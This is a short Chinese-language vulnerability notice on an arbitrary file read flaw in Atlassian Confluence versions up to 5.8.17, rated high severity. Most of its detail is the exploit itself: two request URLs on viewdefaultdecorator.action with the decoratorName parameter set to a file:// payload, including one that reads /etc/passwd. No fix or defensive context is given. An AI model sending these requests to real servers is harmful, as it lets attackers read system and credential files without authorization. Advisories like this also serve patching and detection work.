Atlassian Confluence
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。
漏洞简介
漏洞名称:任意文件读取
漏洞类型:WEB类型漏洞
影响版本:小于或等于5.8.17版本
漏洞评级:高危
漏洞详情
漏洞请求:
https://hostdomain/spaces/viewdefaultdecorator.action?decoratorName=PAYLOAD
https://hostdomain/admin/viewdefaultdecorator.action?decoratorName=PAYLOAD
PAYLOAD =》 file:///d:/xxx/xxx 或者 file:////etc/passwd